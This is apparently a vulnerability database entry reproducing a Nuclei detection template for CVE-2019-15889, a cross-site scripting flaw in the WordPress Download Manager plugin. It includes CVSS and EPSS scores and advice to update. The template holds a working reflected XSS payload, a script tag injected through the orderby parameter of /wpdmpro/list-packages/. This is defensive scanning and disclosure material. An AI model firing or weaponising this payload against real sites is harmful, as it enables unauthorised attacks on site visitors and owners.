Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-15889
HistoryJul 11, 2021 - 1:20 a.m.

WordPress Download Manager <2.9.94 - Cross-Site Scripting

2021-07-1101:20:03
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.033 Low

EPSS

Percentile

91.3%

WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.

id: CVE-2019-15889

info:
  name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
  remediation: |
    Update WordPress Download Manager plugin to version 2.9.94 or later to mitigate this vulnerability.
  reference:
    - https://www.cybersecurity-help.cz/vdb/SB2019041819
    - https://wordpress.org/plugins/download-manager/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15889
    - http://packetstormsecurity.com/files/154356/WordPress-Download-Manager-2.9.93-Cross-Site-Scripting.html
    - https://plugins.trac.wordpress.org/changeset/2070388/download-manager
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-15889
    cwe-id: CWE-79
    epss-score: 0.03259
    epss-percentile: 0.91254
    cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpdownloadmanager
    product: "wordpress_download_manager"
    framework: wordpress
  tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Download Manager'
          - 'License:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e90ac8ee5bc2cb7702a36eaba6b7f61ada92416dc6cde6dfcad4cab62dab86b7022100ba8673011e6db0f0d5b1541224ae16f66abc184fa5e3cfd4a74fc0913a45e6f7:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.033 Low

EPSS

Percentile

91.3%